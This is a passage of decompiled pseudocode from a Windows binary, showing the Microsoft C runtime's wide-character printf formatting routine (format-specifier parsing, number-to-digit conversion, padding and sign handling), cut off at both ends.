												_t483 = E0041F270(_t672 + 0x14);
												_t675 = _t674 + 4;
												 *(_t672 - 0x4a0) = _t483;
												 *(_t672 - 0x49c) = 0;
											} else {
												_t556 = E0041F270(_t672 + 0x14);
												_t675 = _t674 + 4;
												asm("cdq");
												 *(_t672 - 0x4a0) = _t556;
												 *(_t672 - 0x49c) = _t623;
											}
										} else {
											_t669 =  *(_t672 - 0x10) & 0x00000040;
											if(_t669 == 0) {
												_t557 = E0041F270(_t672 + 0x14);
												_t675 = _t674 + 4;
												asm("cdq");
												 *(_t672 - 0x4a0) = _t557 & 0x0000ffff;
												 *(_t672 - 0x49c) = _t669;
											} else {
												_t560 = E0041F270(_t672 + 0x14);
												_t675 = _t674 + 4;
												asm("cdq");
												 *(_t672 - 0x4a0) = _t560;
												 *(_t672 - 0x49c) = _t669;
											}
										}
									} else {
										_t563 = E0041F290(_t672 + 0x14);
										_t675 = _t674 + 4;
										 *(_t672 - 0x4a0) = _t563;
										 *(_t672 - 0x49c) = _t621;
									}
								} else {
									_t564 = E0041F290(_t672 + 0x14);
									_t675 = _t674 + 4;
									 *(_t672 - 0x4a0) = _t564;
									 *(_t672 - 0x49c) = _t619;
								}
								if(( *(_t672 - 0x10) & 0x00000040) == 0) {
									L167:
									 *(_t672 - 0x4a8) =  *(_t672 - 0x4a0);
									 *(_t672 - 0x4a4) =  *(_t672 - 0x49c);
									goto L168;
								} else {
									L163:
									_t681 =  *(_t672 - 0x49c);
									if(_t681 > 0 || _t681 >= 0 &&  *(_t672 - 0x4a0) >= 0) {
										goto L167;
									} else {
										L166:
										asm("adc edx, 0x0");
										 *(_t672 - 0x4a8) =  ~( *(_t672 - 0x4a0));
										 *(_t672 - 0x4a4) =  ~( *(_t672 - 0x49c));
										 *(_t672 - 0x10) =  *(_t672 - 0x10) | 0x00000100;
										L168:
										if(( *(_t672 - 0x10) & 0x00008000) == 0 && ( *(_t672 - 0x10) & 0x00001000) == 0) {
											 *(_t672 - 0x4a4) =  *(_t672 - 0x4a4) & 0x00000000;
										}
										if( *(_t672 - 0x30) >= 0) {
											 *(_t672 - 0x10) =  *(_t672 - 0x10) & 0xfffffff7;
											if( *(_t672 - 0x30) > 0x200) {
												 *(_t672 - 0x30) = 0x200;
											}
										} else {
											 *(_t672 - 0x30) = 1;
										}
										if(( *(_t672 - 0x4a8) |  *(_t672 - 0x4a4)) == 0) {
											 *(_t672 - 0x1c) = 0;
										}
										 *((intOrPtr*)(_t672 - 4)) = _t672 - 0x249;
										while(1) {
											L178:
											_t629 =  *(_t672 - 0x30) - 1;
											 *(_t672 - 0x30) =  *(_t672 - 0x30) - 1;
											if( *(_t672 - 0x30) <= 0 && ( *(_t672 - 0x4a8) |  *(_t672 - 0x4a4)) == 0) {
												break;
											}
											L180:
											asm("cdq");
											_t630 =  *(_t672 - 0x4a8);
											 *((intOrPtr*)(_t672 - 0x494)) = E00421720(_t630,  *(_t672 - 0x4a4),  *(_t672 - 8), _t629) + 0x30;
											asm("cdq");
											 *(_t672 - 0x4a8) = E004216B0( *(_t672 - 0x4a8),  *(_t672 - 0x4a4),  *(_t672 - 8), _t630);
											 *(_t672 - 0x4a4) = _t630;
											if( *((intOrPtr*)(_t672 - 0x494)) > 0x39) {
												 *((intOrPtr*)(_t672 - 0x494)) =  *((intOrPtr*)(_t672 - 0x494)) +  *((intOrPtr*)(_t672 - 0x460));
											}
											 *((char*)( *((intOrPtr*)(_t672 - 4)))) =  *((intOrPtr*)(_t672 - 0x494));
											 *((intOrPtr*)(_t672 - 4)) =  *((intOrPtr*)(_t672 - 4)) - 1;
										}
										L183:
										 *((intOrPtr*)(_t672 - 0x24)) = _t672 - 0x249 -  *((intOrPtr*)(_t672 - 4));
										 *((intOrPtr*)(_t672 - 4)) =  *((intOrPtr*)(_t672 - 4)) + 1;
										if(( *(_t672 - 0x10) & 0x00000200) != 0 && ( *((intOrPtr*)(_t672 - 0x24)) == 0 ||  *((char*)( *((intOrPtr*)(_t672 - 4)))) != 0x30)) {
											 *((intOrPtr*)(_t672 - 4)) =  *((intOrPtr*)(_t672 - 4)) - 1;
											 *((char*)( *((intOrPtr*)(_t672 - 4)))) = 0x30;
											 *((intOrPtr*)(_t672 - 0x24)) =  *((intOrPtr*)(_t672 - 0x24)) + 1;
										}
										L187:
										while(1) {
											L187:
											while(1) {
												L187:
												while(1) {
													L187:
													while(1) {
														L187:
														while(1) {
															L187:
															while(1) {
																L187:
																while(1) {
																	do {
																		L187:
																		if( *((intOrPtr*)(_t672 - 0x28)) != 0) {
																			L212:
																			if( *(_t672 - 0x20) != 0) {
																				L0040F230( *(_t672 - 0x20), 2);
																				_t675 = _t675 + 8;
																				 *(_t672 - 0x20) = 0;
																			}
																			while(1) {
																				L214:
																				 *(_t672 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t672 + 0xc))));
																				_t578 =  *(_t672 - 0x454) & 0x0000ffff;
																				 *((intOrPtr*)(_t672 + 0xc)) =  *((intOrPtr*)(_t672 + 0xc)) + 2;
																				if(( *(_t672 - 0x454) & 0x0000ffff) == 0 ||  *(_t672 - 0x44c) < 0) {
																					break;
																				} else {
																					if(( *(_t672 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t672 - 0x454) & 0x0000ffff) > 0x78) {
																						 *(_t672 - 0x4d8) = 0;
																					} else {
																						 *(_t672 - 0x4d8) =  *(( *(_t672 - 0x454) & 0x0000ffff) + L"h != _T(\'\\0\'))") & 0xf;
																					}
																				}
																				L7:
																				 *(_t672 - 0x450) =  *(_t672 - 0x4d8);
																				_t642 =  *(_t672 - 0x450) * 9;
																				_t509 =  *(_t672 - 0x45c);
																				_t586 = ( *(_t642 + _t509 + 0x4081a0) & 0x000000ff) >> 4;
																				 *(_t672 - 0x45c) = ( *(_t642 + _t509 + 0x4081a0) & 0x000000ff) >> 4;
																				if( *(_t672 - 0x45c) != 8) {
																					L16:
																					 *(_t672 - 0x4e0) =  *(_t672 - 0x45c);
																					if( *(_t672 - 0x4e0) > 7) {
																						continue;
																					}
																					L17:
																					switch( *((intOrPtr*)( *(_t672 - 0x4e0) * 4 +  &M00423E24))) {
																						case 0:
																							L18:
																							 *(_t672 - 0xc) = 1;
																							E00423F30( *(_t672 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
																							_t675 = _t675 + 0xc;
																							goto L214;
																						case 1:
																							L19:
																							 *(__ebp - 0x2c) = 0;
																							__ecx =  *(__ebp - 0x2c);
																							 *(__ebp - 0x28) = __ecx;
																							__edx =  *(__ebp - 0x28);
																							 *(__ebp - 0x18) =  *(__ebp - 0x28);
																							__eax =  *(__ebp - 0x18);
																							 *(__ebp - 0x1c) =  *(__ebp - 0x18);
																							 *(__ebp - 0x10) = 0;
																							 *(__ebp - 0x30) = 0xffffffff;
																							 *(__ebp - 0xc) = 0;
																							goto L214;
																						case 2:
																							L20:
																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
																							 *(__ebp - 0x4e4) = __ecx;
																							 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
																							 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
																							if( *(__ebp - 0x4e4) > 0x10) {
																								goto L27;
																							}
																							L21:
																							_t57 =  *(__ebp - 0x4e4) + 0x423e5c; // 0x498d04
																							__ecx =  *_t57 & 0x000000ff;
																							switch( *((intOrPtr*)(__ecx * 4 +  &M00423E44))) {
																								case 0:
																									goto L24;
																								case 1:
																									goto L25;
																								case 2:
																									goto L23;
																								case 3:
																									goto L22;
																								case 4:
																									goto L26;
																								case 5:
																									goto L27;
																							}
																						case 3:
																							L28:
																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
																							if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
																								 *(__ebp - 0x18) =  *(__ebp - 0x18) * 0xa;
																								_t81 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
																								__ecx =  *(__ebp - 0x18) * 0xa + _t81;
																								 *(__ebp - 0x18) = __ecx;
																							} else {
																								__edx = __ebp + 0x14;
																								 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
																								if( *(__ebp - 0x18) < 0) {
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																									__ecx =  *(__ebp - 0x18);
																									__ecx =  ~( *(__ebp - 0x18));
																									 *(__ebp - 0x18) = __ecx;
																								}
																							}
																							goto L214;
																						case 4:
																							L34:
																							 *(__ebp - 0x30) = 0;
																							goto L214;
																						case 5:
																							L35:
																							__edx =  *(__ebp - 0x454) & 0x0000ffff;
																							if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
																								__ecx =  *(__ebp - 0x30);
																								__ecx =  *(__ebp - 0x30) * 0xa;
																								_t92 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
																								__eax = __ecx + _t92;
																								 *(__ebp - 0x30) = __ecx + _t92;
																							} else {
																								__eax = __ebp + 0x14;
																								 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
																								if( *(__ebp - 0x30) < 0) {
																									 *(__ebp - 0x30) = 0xffffffff;
																								}
																							}
																							goto L214;
																						case 6:
																							L41:
																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
																							 *(__ebp - 0x4e8) = __ecx;
																							 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
																							 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
																							if( *(__ebp - 0x4e8) > 0x2e) {
																								L64:
																								goto L214;
																							}
																							L42:
																							_t100 =  *(__ebp - 0x4e8) + 0x423e84; // 0x36919003
																							__ecx =  *_t100 & 0x000000ff;
																							switch( *((intOrPtr*)(__ecx * 4 +  &M00423E70))) {
																								case 0:
																									L47:
																									__ecx =  *(__ebp + 0xc);
																									__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																									if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
																										L50:
																										__ecx =  *(__ebp + 0xc);
																										__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																										if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
																											L53:
																											__ecx =  *(__ebp + 0xc);
																											__edx =  *__ecx & 0x0000ffff;
																											if(( *__ecx & 0x0000ffff) == 0x64) {
																												L59:
																												L61:
																												goto L64;
																											}
																											L54:
																											__eax =  *(__ebp + 0xc);
																											__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																											if(__ecx == 0x69) {
																												goto L59;
																											}
																											L55:
																											__edx =  *(__ebp + 0xc);
																											__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																											if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
																												goto L59;
																											}
																											L56:
																											__ecx =  *(__ebp + 0xc);
																											__edx =  *__ecx & 0x0000ffff;
																											if(( *__ecx & 0x0000ffff) == 0x75) {
																												goto L59;
																											}
																											L57:
																											__eax =  *(__ebp + 0xc);
																											__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																											if(__ecx == 0x78) {
																												goto L59;
																											}
																											L58:
																											__edx =  *(__ebp + 0xc);
																											__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																											if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
																												 *(__ebp - 0x45c) = 0;
																												goto L18;
																											}
																											goto L59;
																										}
																										L51:
																										__eax =  *(__ebp + 0xc);
																										__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
																										if(__ecx != 0x32) {
																											goto L53;
																										} else {
																											 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																											 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
																											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
																											goto L61;
																										}
																									}
																									L48:
																									__eax =  *(__ebp + 0xc);
																									__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
																									if(__ecx != 0x34) {
																										goto L50;
																									} else {
																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
																										goto L61;
																									}
																								case 1:
																									L62:
																									__ecx =  *(__ebp - 0x10);
																									__ecx =  *(__ebp - 0x10) | 0x00000020;
																									 *(__ebp - 0x10) = __ecx;
																									goto L64;
																								case 2:
																									L43:
																									__edx =  *(__ebp + 0xc);
																									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																									if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000010;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000010;
																									} else {
																										__ecx =  *(__ebp + 0xc);
																										__ecx =  *(__ebp + 0xc) + 2;
																										 *(__ebp + 0xc) = __ecx;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																									}
																									goto L64;
																								case 3:
																									L63:
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
																									goto L64;
																								case 4:
																									goto L64;
																							}
																						case 7:
																							goto L65;
																						case 8:
																							L24:
																							__ecx =  *(__ebp - 0x10);
																							__ecx =  *(__ebp - 0x10) | 0x00000002;
																							 *(__ebp - 0x10) = __ecx;
																							goto L27;
																						case 9:
																							L25:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
																							goto L27;
																						case 0xa:
																							L23:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
																							goto L27;
																						case 0xb:
																							L22:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																							goto L27;
																						case 0xc:
																							L26:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000008;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000008;
																							goto L27;
																						case 0xd:
																							L27:
																							goto L214;
																					}
																				} else {
																					_t640 = 0;
																					if(0 == 0) {
																						 *(_t672 - 0x4dc) = 0;
																					} else {
																						 *(_t672 - 0x4dc) = 1;
																					}
																					 *(_t672 - 0x46c) =  *(_t672 - 0x4dc);
																					if( *(_t672 - 0x46c) == 0) {
																						_push(L"(\"Incorrect format specifier\", 0)");
																						_push(0);
																						_push(0x460);
																						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																						_push(2);
																						_t517 = L0040C820();
																						_t675 = _t675 + 0x14;
																						if(_t517 == 1) {
																							asm("int3");
																						}
																					}
																					L14:
																					if( *(_t672 - 0x46c) != 0) {
																						goto L16;
																					} else {
																						 *((intOrPtr*)(L00411810(_t586))) = 0x16;
																						E0040C660(_t565, _t586, _t670, _t671, L"(\"Incorrect format specifier\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
																						 *(_t672 - 0x4c8) = 0xffffffff;
																						E00410370(_t672 - 0x40);
																						_t502 =  *(_t672 - 0x4c8);
																						L225:
																						return E00410900(_t502, _t565,  *(_t672 - 0x48) ^ _t672, _t640, _t670, _t671);
																					}
																				}
																			}
																			L215:
																			if( *(_t672 - 0x45c) == 0 ||  *(_t672 - 0x45c) == 7) {
																				 *(_t672 - 0x4f8) = 1;
																			} else {
																				 *(_t672 - 0x4f8) = 0;
																			}
																			_t640 =  *(_t672 - 0x4f8);
																			 *(_t672 - 0x4bc) =  *(_t672 - 0x4f8);
																			if( *(_t672 - 0x4bc) == 0) {
																				_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
																				_push(0);
																				_push(0x8f5);
																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																				_push(2);
																				_t507 = L0040C820();
																				_t675 = _t675 + 0x14;
																				if(_t507 == 1) {
																					asm("int3");
																				}
																			}
																			if( *(_t672 - 0x4bc) != 0) {
																				 *(_t672 - 0x4d4) =  *(_t672 - 0x44c);
																				E00410370(_t672 - 0x40);
																				_t502 =  *(_t672 - 0x4d4);
																			} else {
																				 *((intOrPtr*)(L00411810(_t578))) = 0x16;
																				E0040C660(_t565, _t578, _t670, _t671, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
																				 *(_t672 - 0x4d0) = 0xffffffff;
																				E00410370(_t672 - 0x40);
																				_t502 =  *(_t672 - 0x4d0);
																			}
																			goto L225;
																		}
																		L188:
																		if(( *(_t672 - 0x10) & 0x00000040) != 0) {
																			if(( *(_t672 - 0x10) & 0x00000100) == 0) {
																				if(( *(_t672 - 0x10) & 0x00000001) == 0) {
																					if(( *(_t672 - 0x10) & 0x00000002) != 0) {
																						 *((short*)(_t672 - 0x14)) = 0x20;
																						 *(_t672 - 0x1c) = 1;
																					}
																				} else {
																					 *((short*)(_t672 - 0x14)) = 0x2b;
																					 *(_t672 - 0x1c) = 1;
																				}
																			} else {
																				 *((short*)(_t672 - 0x14)) = 0x2d;
																				 *(_t672 - 0x1c) = 1;
																			}
																		}
																		 *((intOrPtr*)(_t672 - 0x4ac)) =  *((intOrPtr*)(_t672 - 0x18)) -  *((intOrPtr*)(_t672 - 0x24)) -  *(_t672 - 0x1c);
																		if(( *(_t672 - 0x10) & 0x0000000c) == 0) {
																			E00423F90(0x20,  *((intOrPtr*)(_t672 - 0x4ac)),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
																			_t675 = _t675 + 0x10;
																		}
																		E00423FD0( *(_t672 - 0x1c), _t672 - 0x14,  *(_t672 - 0x1c),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
																		_t675 = _t675 + 0x10;
																		if(( *(_t672 - 0x10) & 0x00000008) != 0 && ( *(_t672 - 0x10) & 0x00000004) == 0) {
																			E00423F90(0x30,  *((intOrPtr*)(_t672 - 0x4ac)),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
																			_t675 = _t675 + 0x10;
																		}
																		if( *(_t672 - 0xc) != 0 ||  *((intOrPtr*)(_t672 - 0x24)) <= 0) {
																			L208:
																			E00423FD0( *((intOrPtr*)(_t672 - 0x24)),  *((intOrPtr*)(_t672 - 4)),  *((intOrPtr*)(_t672 - 0x24)),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
																			_t675 = _t675 + 0x10;
																			goto L209;
																		} else {
																			L202:
																			 *((intOrPtr*)(_t672 - 0x4b0)) =  *((intOrPtr*)(_t672 - 4));
																			 *((intOrPtr*)(_t672 - 0x4b4)) =  *((intOrPtr*)(_t672 - 0x24));
																			while(1) {
																				L203:
																				 *((intOrPtr*)(_t672 - 0x4b4)) =  *((intOrPtr*)(_t672 - 0x4b4)) - 1;
																				if( *((intOrPtr*)(_t672 - 0x4b4)) <= 0) {
																					break;
																				}
																				L204:
																				_t535 = E004103A0(_t672 - 0x40);
																				_t539 = E00420B60(_t672 - 0x458,  *((intOrPtr*)(_t672 - 0x4b0)),  *((intOrPtr*)( *((intOrPtr*)(E004103A0(_t672 - 0x40))) + 0xac)), _t535);
																				_t675 = _t675 + 0x10;
																				 *((intOrPtr*)(_t672 - 0x4b8)) = _t539;
																				if( *((intOrPtr*)(_t672 - 0x4b8)) > 0) {
																					L206:
																					E00423F30( *(_t672 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
																					_t675 = _t675 + 0xc;
																					 *((intOrPtr*)(_t672 - 0x4b0)) =  *((intOrPtr*)(_t672 - 0x4b0)) +  *((intOrPtr*)(_t672 - 0x4b8));
																					continue;
																				}
																				L205:
																				 *(_t672 - 0x44c) = 0xffffffff;
																				break;
																			}
																			L207:
																			L209:
																			if( *(_t672 - 0x44c) >= 0 && ( *(_t672 - 0x10) & 0x00000004) != 0) {
																				E00423F90(0x20,  *((intOrPtr*)(_t672 - 0x4ac)),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
																				_t675 = _t675 + 0x10;
																			}
																			goto L212;
																		}
																		L65:
																		__eax =  *(__ebp - 0x454) & 0x0000ffff;
																		 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
																		__ecx =  *(__ebp - 0x4ec);
																		__ecx =  *(__ebp - 0x4ec) - 0x41;
																		 *(__ebp - 0x4ec) = __ecx;
																	} while ( *(__ebp - 0x4ec) > 0x37);
																	__edx =  *(__ebp - 0x4ec);
																	_t141 = __edx + 0x423ef0; // 0xcccccc0d
																	__eax =  *_t141 & 0x000000ff;
																	switch( *((intOrPtr*)(( *_t141 & 0x000000ff) * 4 +  &M00423EB4))) {
																		case 0:
																			L120:
																			 *(__ebp - 0x2c) = 1;
																			 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
																			 *(__ebp - 0x454) = __ax;
																			goto L121;
																		case 1:
																			L67:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																			}
																			goto L69;
																		case 2:
																			L82:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																			}
																			goto L84;
																		case 3:
																			L143:
																			 *((intOrPtr*)(__ebp - 0x460)) = 7;
																			goto L145;
																		case 4:
																			L75:
																			__eax = __ebp + 0x14;
																			 *(__ebp - 0x474) = E0041F270(__ebp + 0x14);
																			if( *(__ebp - 0x474) == 0) {
																				L77:
																				__edx =  *0x4bc060; // 0x408114
																				 *(__ebp - 4) = __edx;
																				__eax =  *(__ebp - 4);
																				 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																				L81:
																				goto L187;
																			}
																			L76:
																			__ecx =  *(__ebp - 0x474);
																			if( *((intOrPtr*)( *(__ebp - 0x474) + 4)) != 0) {
																				L78:
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
																					 *(__ebp - 0xc) = 0;
																					__edx =  *(__ebp - 0x474);
																					__eax =  *(__edx + 4);
																					 *(__ebp - 4) =  *(__edx + 4);
																					__ecx =  *(__ebp - 0x474);
																					__edx =  *__ecx;
																					 *(__ebp - 0x24) =  *__ecx;
																				} else {
																					__edx =  *(__ebp - 0x474);
																					__eax =  *(__edx + 4);
																					 *(__ebp - 4) =  *(__edx + 4);
																					__ecx =  *(__ebp - 0x474);
																					__eax =  *__ecx;
																					asm("cdq");
																					 *__ecx - __edx =  *__ecx - __edx >> 1;
																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
																					 *(__ebp - 0xc) = 1;
																				}
																				goto L81;
																			}
																			goto L77;
																		case 5:
																			L121:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			__edx = __ebp - 0x448;
																			 *(__ebp - 4) = __ebp - 0x448;
																			 *(__ebp - 0x44) = 0x200;
																			if( *(__ebp - 0x30) >= 0) {
																				L123:
																				if( *(__ebp - 0x30) != 0) {
																					L126:
																					if( *(__ebp - 0x30) > 0x200) {
																						 *(__ebp - 0x30) = 0x200;
																					}
																					L128:
																					if( *(__ebp - 0x30) > 0xa3) {
																						__ecx =  *(__ebp - 0x30);
																						__ecx =  *(__ebp - 0x30) + 0x15d;
																						 *(__ebp - 0x20) = L0040E5B0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																						if( *(__ebp - 0x20) == 0) {
																							 *(__ebp - 0x30) = 0xa3;
																						} else {
																							__edx =  *(__ebp - 0x20);
																							 *(__ebp - 4) =  *(__ebp - 0x20);
																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																						}
																					}
																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																					__edx =  *(__ebp + 0x14);
																					__eax =  *(__edx - 8);
																					__ecx =  *(__edx - 4);
																					 *(__ebp - 0x490) =  *(__edx - 8);
																					 *(__ebp - 0x48c) =  *(__edx - 4);
																					__ecx = __ebp - 0x40;
																					_push(E004103A0(__ebp - 0x40));
																					__edx =  *(__ebp - 0x2c);
																					_push( *(__ebp - 0x2c));
																					__eax =  *(__ebp - 0x30);
																					_push( *(__ebp - 0x30));
																					__ecx =  *(__ebp - 0x454);
																					_push( *(__ebp - 0x454));
																					__edx =  *(__ebp - 0x44);
																					_push( *(__ebp - 0x44));
																					__eax =  *(__ebp - 4);
																					_push( *(__ebp - 4));
																					__ecx = __ebp - 0x490;
																					_push(__ebp - 0x490);
																					__edx =  *0x4bb808; // 0x776010b9
																					E00411D00(__edx) =  *__eax();
																					__esp = __esp + 0x1c;
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																					if(( *(__ebp - 0x10) & 0x00000080) != 0 &&  *(__ebp - 0x30) == 0) {
																						__ecx = __ebp - 0x40;
																						_push(E004103A0(__ebp - 0x40));
																						__ecx =  *(__ebp - 4);
																						_push( *(__ebp - 4));
																						__edx =  *0x4bb814; // 0x776010b9
																						E00411D00(__edx) =  *__eax();
																						__esp = __esp + 8;
																					}
																					__eax =  *(__ebp - 0x454) & 0x0000ffff;
																					if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																							__ecx = __ebp - 0x40;
																							_push(E004103A0(__ebp - 0x40));
																							__edx =  *(__ebp - 4);
																							_push( *(__ebp - 4));
																							__eax =  *0x4bb810; // 0x776010b9
																							__eax =  *__eax();
																							__esp = __esp + 8;
																						}
																					}
																					__ecx =  *(__ebp - 4);
																					__edx =  *( *(__ebp - 4));
																					if( *( *(__ebp - 4)) == 0x2d) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
																					}
																					__edx =  *(__ebp - 4);
																					 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																					goto L187;
																				}
																				L124:
																				__eax =  *(__ebp - 0x454) & 0x0000ffff;
																				if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
																					goto L126;
																				}
																				L125:
																				 *(__ebp - 0x30) = 1;
																				goto L128;
																			}
																			L122:
																			 *(__ebp - 0x30) = 6;
																			goto L128;
																		case 6:
																			L69:
																			 *(__ebp - 0xc) = 1;
																			__ebp + 0x14 = E0041F270(__ebp + 0x14);
																			 *(__ebp - 0x458) = __ax;
																			__ecx =  *(__ebp - 0x10);
																			__ecx =  *(__ebp - 0x10) & 0x00000020;
																			if(__ecx == 0) {
																				 *(__ebp - 0x448) =  *(__ebp - 0x458);
																			} else {
																				 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
																				 *(__ebp - 0x470) = __dl;
																				 *((char*)(__ebp - 0x46f)) = 0;
																				__ecx = __ebp - 0x40;
																				__eax = E004103A0(__ebp - 0x40);
																				__ecx = __ebp - 0x40;
																				E004103A0(__ebp - 0x40) =  *__eax;
																				__ecx =  *(__ebp - 0x448 + 0xac);
																				__edx = __ebp - 0x470;
																				__eax = __ebp - 0x448;
																				if(E00420B60(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448) < 0) {
																					 *(__ebp - 0x28) = 1;
																				}
																			}
																			__edx = __ebp - 0x448;
																			 *(__ebp - 4) = __ebp - 0x448;
																			 *(__ebp - 0x24) = 1;
																			goto L187;
																		case 7:
																			L141:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 8) = 0xa;
																			goto L150;
																		case 8:
																			L106:
																			__eax = __ebp + 0x14;
																			 *(__ebp - 0x484) = E0041F270(__ebp + 0x14);
																			if(E00424120() != 0) {
																				L116:
																				__ecx =  *(__ebp - 0x10);
																				__ecx =  *(__ebp - 0x10) & 0x00000020;
																				if(__ecx == 0) {
																					__ecx =  *(__ebp - 0x484);
																					__edx =  *(__ebp - 0x44c);
																					 *__ecx =  *(__ebp - 0x44c);
																				} else {
																					__edx =  *(__ebp - 0x484);
																					__ax =  *(__ebp - 0x44c);
